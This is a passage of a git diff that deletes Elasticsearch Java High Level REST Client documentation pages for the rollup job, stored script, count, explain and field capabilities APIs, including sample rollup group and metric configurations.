capabilities, what -aggregations are available, etc). Because multiple jobs can be stored in one index, the -response may include several jobs with different configurations. - -The capabilities are essentially the same as the original job configuration, just presented in a different -manner. For example, if we had created a job with the following config: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-setup] --------------------------------------------------- - -The +{response}+ object would contain the same information, laid out in a slightly different manner: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-response] --------------------------------------------------- - -[id="{upid}-x-pack-{api}-async"] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-execute-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-{api}-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/rollup/put_job.asciidoc b/docs/java-rest/high-level/rollup/put_job.asciidoc deleted file mode 100644 index b43f257937c..00000000000 --- a/docs/java-rest/high-level/rollup/put_job.asciidoc +++ /dev/null @@ -1,175 +0,0 @@ -[role="xpack"] -[[java-rest-high-x-pack-rollup-put-job]] -=== Put Rollup Job API - -experimental::[] - -The Put Rollup Job API can be used to create a new Rollup job -in the cluster. The API accepts a `PutRollupJobRequest` object -as a request and returns a `PutRollupJobResponse`. - -[[java-rest-high-x-pack-rollup-put-rollup-job-request]] -==== Put Rollup Job Request - -A `PutRollupJobRequest` requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-request] --------------------------------------------------- -<1> The configuration of the Rollup job to create as a `RollupJobConfig` - -[[java-rest-high-x-pack-rollup-put-rollup-job-config]] -==== Rollup Job Configuration - -The `RollupJobConfig` object contains all the details about the rollup job -configuration. See {ref}/rollup-put-job.html[create rollup job API] to learn more -about the various configuration settings. - -A `RollupJobConfig` requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-config] --------------------------------------------------- -<1> The name of the Rollup job -<2> The index (or index pattern) to rollup -<3> The index to store rollup results into -<4> A cron expression which defines when the Rollup job should be executed -<5> The page size to use for the Rollup job -<6> The grouping configuration of the Rollup job as a `GroupConfig` -<7> The metrics configuration of the Rollup job as a list of `MetricConfig` -<8> The timeout value to use for the Rollup job as a `TimeValue` - - -[[java-rest-high-x-pack-rollup-put-rollup-job-group-config]] -==== Grouping Configuration - -The grouping configuration of the Rollup job is defined in the `RollupJobConfig` -using a `GroupConfig` instance. `GroupConfig` reflects all the configuration -settings that can be defined using the REST API. See {ref}/rollup-put-job.html#rollup-groups-config[Grouping config] -to learn more about these settings. - -Using the REST API, we could define this grouping configuration: - -[source,js] --------------------------------------------------- -"groups" : { - "date_histogram": { - "field": "timestamp", - "calendar_interval": "1h", - "delay": "7d", - "time_zone": "UTC" - }, - "terms": { - "fields": ["hostname", "datacenter"] - }, - "histogram": { - "fields": ["load", "net_in", "net_out"], - "interval": 5 - } -} --------------------------------------------------- -// NOTCONSOLE - -Using the `GroupConfig` object and the high level REST client, the same -configuration would be: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-group-config] --------------------------------------------------- -<1> The date histogram aggregation to use to rollup up documents, as a `DateHistogramGroupConfig` -<2> The terms aggregation to use to rollup up documents, as a `TermsGroupConfig` -<3> The histogram aggregation to use to rollup up documents, as a `HistogramGroupConfig` -<4> The grouping configuration as a `GroupConfig` - - -[[java-rest-high-x-pack-rollup-put-rollup-job-metrics-config]] -==== Metrics Configuration - -After defining which groups should be generated for the data, you next configure -which metrics should be collected. The list of metrics is defined in the `RollupJobConfig` -using a `List` instance. `MetricConfig` reflects all the configuration -settings that can be defined using the REST API. See {ref}/rollup-put-job.html#rollup-metrics-config[Metrics config] -to learn more about these settings. - -Using the REST API, we could define this metrics configuration: - -[source,js] --------------------------------------------------- -"metrics": [ - { - "field": "temperature", - "metrics": ["min", "max", "sum"] - }, - { - "field": "voltage", - "metrics": ["avg", "value_count"] - } -] --------------------------------------------------- -// NOTCONSOLE - -Using the `MetricConfig` object and the high level REST client, the same -configuration would be: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-metrics-config] --------------------------------------------------- -<1> The list of `MetricConfig` to configure in the `RollupJobConfig` -<2> Adds the metrics to compute on the `temperature` field -<3> Adds the metrics to compute on the `voltage` field - - -[[java-rest-high-x-pack-rollup-put-rollup-job-execution]] -==== Execution - -The Put Rollup Job API can be executed through a `RollupClient` -instance. Such instance can be retrieved from a `RestHighLevelClient` -using the `rollup()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-execute] --------------------------------------------------- - -[[java-rest-high-x-pack-rollup-put-rollup-job-response]] -==== Response - -The returned `PutRollupJobResponse` indicates if the new Rollup job -has been successfully created: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-response] --------------------------------------------------- -<1> `acknowledged` is a boolean indicating whether the job was successfully created - -[[java-rest-high-x-pack-rollup-put-rollup-job-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-execute-async] --------------------------------------------------- -<1> The `PutRollupJobRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `PutRollupJobResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RollupDocumentationIT.java[x-pack-rollup-put-rollup-job-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/rollup/search.asciidoc b/docs/java-rest/high-level/rollup/search.asciidoc deleted file mode 100644 index ac70ed742f1..00000000000 --- a/docs/java-rest/high-level/rollup/search.asciidoc +++ /dev/null @@ -1,47 +0,0 @@ --- -:api: search -:request: SearchRequest -:response: SearchResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Rollup Search API - -experimental::[] - -The Rollup Search endpoint allows searching rolled-up data using the standard -query DSL. The Rollup Search endpoint is needed because, internally, -rolled-up documents utilize a different document structure than the original -data. The Rollup Search endpoint rewrites standard query DSL into a format that -matches the rollup documents, then takes the response and rewrites it back to -what a client would expect given the original query. - -[id="{upid}-{api}-request"] -==== Request - -Rollup Search uses the same +{request}+ that is used by the <<{mainid}-search>> -but it is mostly for aggregations you should set the `size` to 0 and add -aggregations like this: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -NOTE:: Rollup Search is limited in many ways because only some query elements -can be translated into queries against the rollup indices. See the main -{ref}/rollup-search.html[Rollup Search] documentation for more. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -Rollup Search returns the same +{response}+ that is used by the -<<{mainid}-search>> and everything can be accessed in exactly the same way. -This will access the aggregation built by the example request above: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/rollup/start_job.asciidoc b/docs/java-rest/high-level/rollup/start_job.asciidoc deleted file mode 100644 index 0e0fc073ac6..00000000000 --- a/docs/java-rest/high-level/rollup/start_job.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: rollup-start-job -:request: StartRollupJobRequest -:response: StartRollupJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start Rollup Job API - -experimental::[] - -[id="{upid}-{api}-request"] -==== Request - -The Start Rollup Job API allows you to start a job by ID. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the job to start. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the start command was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the start job request was received. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/rollup/stop_job.asciidoc b/docs/java-rest/high-level/rollup/stop_job.asciidoc deleted file mode 100644 index 9ebd97dc837..00000000000 --- a/docs/java-rest/high-level/rollup/stop_job.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ --- -:api: rollup-stop-job -:request: StopRollupJobRequest -:response: StopRollupJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop Rollup Job API - -experimental::[] - -[id="{upid}-{api}-request"] -==== Request - -The Stop Rollup Job API allows you to stop a job by ID. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the job to stop. -<2> Whether the request should wait that the stop operation has completed -before returning (optional, defaults to `false`) -<3> If `wait_for_completion=true`, this parameter controls how long to wait -before giving up and throwing an error (optional, defaults to 30 seconds). - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the stop command was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the stop job request was received. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/script/delete_script.asciidoc b/docs/java-rest/high-level/script/delete_script.asciidoc deleted file mode 100644 index 79b3b0b3247..00000000000 --- a/docs/java-rest/high-level/script/delete_script.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -[[java-rest-high-delete-stored-script]] - -=== Delete Stored Script API - -[[java-rest-high-delete-stored-script-request]] -==== Delete Stored Script Request - -A `DeleteStoredScriptRequest` requires an `id`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-request] --------------------------------------------------- -<1> The id of the script - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the stored script is deleted as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the stored script is deleted as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-delete-stored-script-sync]] -==== Synchronous Execution -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-execute] --------------------------------------------------- - -[[java-rest-high-delete-stored-script-async]] -==== Asynchronous Execution - -The asynchronous execution of a delete stored script request requires both the `DeleteStoredScriptRequest` -instance and an `ActionListener` instance to be passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-execute-async] --------------------------------------------------- -<1> The `DeleteStoredScriptRequest` to execute and the `ActionListener` to use when -the execution completes - -[[java-rest-high-delete-stored-script-listener]] -===== Action Listener - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `DeleteStoredScriptResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-delete-stored-script-response]] -==== Delete Stored Script Response - -The returned `DeleteStoredScriptResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[delete-stored-script-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request \ No newline at end of file diff --git a/docs/java-rest/high-level/script/get_script.asciidoc b/docs/java-rest/high-level/script/get_script.asciidoc deleted file mode 100644 index a38bdad2bd6..00000000000 --- a/docs/java-rest/high-level/script/get_script.asciidoc +++ /dev/null @@ -1,77 +0,0 @@ -[[java-rest-high-get-stored-script]] - -=== Get Stored Script API - -[[java-rest-high-get-stored-script-request]] -==== Get Stored Script Request - -A `GetStoredScriptRequest` requires an `id`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[get-stored-script-request] --------------------------------------------------- -<1> The id of the script - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[get-stored-script-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-get-stored-script-sync]] -==== Synchronous Execution -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[get-stored-script-execute] --------------------------------------------------- - -[[java-rest-high-get-stored-script-async]] -==== Asynchronous Execution - -The asynchronous execution of a get stored script request requires both the `GetStoredScriptRequest` -instance and an `ActionListener` instance to be passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[get-stored-script-execute-async] --------------------------------------------------- -<1> The `GetStoredScriptRequest` to execute and the `ActionListener` to use when -the execution completes - -[[java-rest-high-get-stored-script-listener]] -===== Action Listener - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `GetStoredScriptResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[get-stored-script-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-get-stored-script-response]] -==== Get Stored Script Response - -The returned `GetStoredScriptResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[get-stored-script-response] --------------------------------------------------- -<1> The script object consists of a content and a metadata -<2> The language the script is written in, which defaults to `painless`. -<3> The content of the script -<4> Any named options that should be passed into the script. \ No newline at end of file diff --git a/docs/java-rest/high-level/script/put_script.asciidoc b/docs/java-rest/high-level/script/put_script.asciidoc deleted file mode 100644 index acc80e82d11..00000000000 --- a/docs/java-rest/high-level/script/put_script.asciidoc +++ /dev/null @@ -1,106 +0,0 @@ -[[java-rest-high-put-stored-script]] -=== Put Stored Script API - -[[java-rest-high-put-stored-script-request]] -==== Put Stored Script Request - -A `PutStoredScriptRequest` requires an `id` and `content`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-request] --------------------------------------------------- -<1> The id of the script -<2> The content of the script - -[[java-rest-high-put-stored-script-content]] -==== Content -The content of a script can be written in different languages and provided in -different ways: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-content-painless] --------------------------------------------------- -<1> Specify a painless script and provided as `XContentBuilder` object. -Note that the builder needs to be passed as a `BytesReference` object - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-content-mustache] --------------------------------------------------- -<1> Specify a mustache script and provided as `XContentBuilder` object. -Note that value of source can be directly provided as a JSON string - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-context] --------------------------------------------------- -<1> The context the script should be executed in. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the script creation as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the script creation as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-put-stored-script-sync]] -==== Synchronous Execution -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-execute] --------------------------------------------------- - -[[java-rest-high-put-stored-script-async]] -==== Asynchronous Execution - -The asynchronous execution of a put stored script request requires both the `PutStoredScriptRequest` -instance and an `ActionListener` instance to be passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-execute-async] --------------------------------------------------- -<1> The `PutStoredScriptRequest` to execute and the `ActionListener` to use when -the execution completes - -[[java-rest-high-put-stored-script-listener]] -===== Action Listener - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `AcknowledgedResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-put-stored-script-response]] -==== Put Stored Script Response - -The returned `AcknowledgedResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/StoredScriptsDocumentationIT.java[put-stored-script-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request \ No newline at end of file diff --git a/docs/java-rest/high-level/search/count.asciidoc b/docs/java-rest/high-level/search/count.asciidoc deleted file mode 100644 index 2796d34ab36..00000000000 --- a/docs/java-rest/high-level/search/count.asciidoc +++ /dev/null @@ -1,96 +0,0 @@ --- -:api: count -:request: CountRequest -:response: CountResponse --- -[id="{upid}-{api}"] - -=== Count API - -[id="{upid}-{api}-request"] - -==== Count Request - -The +{request}+ is used to execute a query and get the number of matches for the query. The query to use in +{request}+ can be -set in similar way as query in `SearchRequest` using `SearchSourceBuilder`. - -In its most basic form, we can add a query to the request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-basic] --------------------------------------------------- - -<1> Creates the +{request}+. Without arguments this runs against all indices. -<2> Most search parameters are added to the `SearchSourceBuilder`. -<3> Add a `match_all` query to the `SearchSourceBuilder`. -<4> Add the `SearchSourceBuilder` to the +{request}+. - -[[java-rest-high-count-request-optional]] -===== Count Request optional arguments - -A +{request}+ also takes the following optional arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-args] --------------------------------------------------- -<1> Restricts the request to an index -<2> Set a routing parameter -<3> Setting `IndicesOptions` controls how unavailable indices are resolved and how wildcard expressions are expanded -<4> Use the preference parameter e.g. to execute the search to prefer local shards. The default is to randomize across shards. - -===== Using the SearchSourceBuilder in CountRequest - -Both in search and count API calls, most options controlling the search behavior can be set on the `SearchSourceBuilder`, -which contains more or less the equivalent of the options in the search request body of the Rest API. - -Here are a few examples of some common options: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-basics] --------------------------------------------------- -<1> Create a `SearchSourceBuilder` with default options. -<2> Set the query. Can be any type of `QueryBuilder` - -After this, the `SearchSourceBuilder` only needs to be added to the -+{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-setter] --------------------------------------------------- - -Note subtle difference when using `SearchSourceBuilder` in `SearchRequest` and using `SearchSourceBuilder` in +{request}+ - using -`SearchSourceBuilder` in `SearchRequest` one can use `SearchSourceBuilder.size()` and `SearchSourceBuilder.from()` methods to set the -number of search hits to return, and the starting index. In +{request}+ we're interested in total number of matches and these methods -have no meaning. - -The <> page gives a list of all available search queries with -their corresponding `QueryBuilder` objects and `QueryBuilders` helper methods. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== CountResponse - -The +{response}+ that is returned by executing the count API call provides total count of hits and details about the count execution -itself, like the HTTP status code, or whether the request terminated early: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-1] --------------------------------------------------- - -The response also provides information about the execution on the -shard level by offering statistics about the total number of shards that were -affected by the underlying search, and the successful vs. unsuccessful shards. Possible -failures can also be handled by iterating over an array off -`ShardSearchFailures` like in the following example: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-2] --------------------------------------------------- - diff --git a/docs/java-rest/high-level/search/explain.asciidoc b/docs/java-rest/high-level/search/explain.asciidoc deleted file mode 100644 index fd23bf1b80c..00000000000 --- a/docs/java-rest/high-level/search/explain.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[[java-rest-high-explain]] -=== Explain API - -The explain api computes a score explanation for a query and a specific document. -This can give useful feedback whether a document matches or didn’t match a specific query. - -[[java-rest-high-explain-request]] -==== Explain Request - -An `ExplainRequest` expects an `index` and an `id` to specify a certain document, -and a query represented by `QueryBuilder` to run against it (the way of <>). - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-request] --------------------------------------------------- - -===== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-request-routing] --------------------------------------------------- -<1> Set a routing parameter - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-request-preference] --------------------------------------------------- -<1> Use the preference parameter e.g. to execute the search to prefer local -shards. The default is to randomize across shards. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-request-source] --------------------------------------------------- -<1> Set to true to retrieve the _source of the document explained. You can also -retrieve part of the document by using _source_include & _source_exclude -(see <> for more details) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-request-stored-field] --------------------------------------------------- -<1> Allows to control which stored fields to return as part of the document explained -(requires the field to be stored separately in the mappings). - -[[java-rest-high-explain-sync]] -==== Synchronous Execution - -The `explain` method executes the request synchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-execute] --------------------------------------------------- - -[[java-rest-high-explain-async]] -==== Asynchronous Execution - -The `explainAsync` method executes the request asynchronously, -calling the provided `ActionListener` when the response is ready: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-execute-async] --------------------------------------------------- -<1> The `ExplainRequest` to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once the request -completes, the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `ExplainResponse` is constructed as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole `ExplainRequest` fails. - -[[java-rest-high-explain-response]] -==== ExplainResponse - -The `ExplainResponse` contains the following information: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[explain-response] --------------------------------------------------- -<1> The index name of the explained document. -<2> The id of the explained document. -<3> Indicates whether or not the explained document exists. -<4> Indicates whether or not there is a match between the explained document and -the provided query (the `match` is retrieved from the lucene `Explanation` behind the scenes -if the lucene `Explanation` models a match, it returns `true`, otherwise it returns `false`). -<5> Indicates whether or not there exists a lucene `Explanation` for this request. -<6> Get the lucene `Explanation` object if there exists. -<7> Get the `GetResult` object if the `_source` or the stored fields are retrieved. - -The `GetResult` contains two maps internally to store the fetched `_source` and stored fields. -You can use the following methods to get them: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[get-result] --------------------------------------------------- -<1> Retrieve the `_source` as a map. -<2> Retrieve the specified stored fields as a map. diff --git a/docs/java-rest/high-level/search/field-caps.asciidoc b/docs/java-rest/high-level/search/field-caps.asciidoc deleted file mode 100644 index 1f5b10ad034..00000000000 --- a/docs/java-rest/high-level/search/field-caps.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[[java-rest-high-field-caps]] -=== Field Capabilities API - -The field capabilities API allows for retrieving the capabilities of fields across multiple indices. - -[[java-rest-high-field-caps-request]] -==== Field Capabilities Request - -A `FieldCapabilitiesRequest` contains a list of fields to get capabilities for, -should be returned, plus an optional list of target indices. If no indices -are provided, the request will be executed on all indices. - -Note that fields parameter supports wildcard notation. For example, providing `text_*` -will cause all fields that match the expression to be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[field-caps-request] --------------------------------------------------- - -[[java-rest-high-field-caps-request-optional]] -===== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[field-caps-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded. - -[[java-rest-high-field-caps-sync]] -==== Synchronous Execution - -The `fieldCaps` method executes the request synchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[field-caps-execute] --------------------------------------------------- - -[[java-rest-high-field-caps-async]] -==== Asynchronous Execution - -The `fieldCapsAsync` method executes the request asynchronously, -calling the provided `ActionListener` when the response is ready: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[field-caps-execute-async] --------------------------------------------------- -<1> The `FieldCapabilitiesRequest` to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once the request -completes, the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `FieldCapabilitiesResponse` is constructed as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[field-caps-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole `FieldCapabilitiesRequest` fails. - -[[java-rest-high-field-caps-response]] -==== FieldCapabilitiesResponse - -For each requested field, the returned `FieldCapabilitiesResponse` contains its type -and whether or not it can be searched or aggregated on. The response also gives -information about how each index contributes to the field's capabilities. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[field-caps-response] --------------------------------------------------- -<1> A map with entries for the field's possible types, in this case `keyword` and `text`. -<2> All indices where the `user` field has type `keyword`. -<3> The subset of these indices where the `user` field isn't searchable, or null if it's always searchable. -<4> Another subset of these indices where the `user` field isn't aggregatable, or null if it's always aggregatable. \ No newline at end of file diff --git a/docs/java-rest/high-level/search/multi-search-template.asciidoc b/docs/java-rest/high-level/search/multi-search-template.asciidoc deleted file mode 100644 index c5133f6614e..00000000000 --- a/docs/java-rest/high-level/search/multi-search-template.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -[[java-rest-high-multi-search-template]] -=== Multi-Search-Template API - -The `multiSearchTemplate` API executes multiple <> -requests in a single http request in parallel. - -[[java-rest-high-multi-search-template-request]] -==== Multi-Search-Template Request - -The `MultiSearchTemplateRequest` is built empty and you add all of the searches that -you wish to execute to it: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-template-request-inline] --------------------------------------------------- -<1> Create an empty `MultiSearchTemplateRequest`. -<2> Create one or more `SearchTemplateRequest` objects and 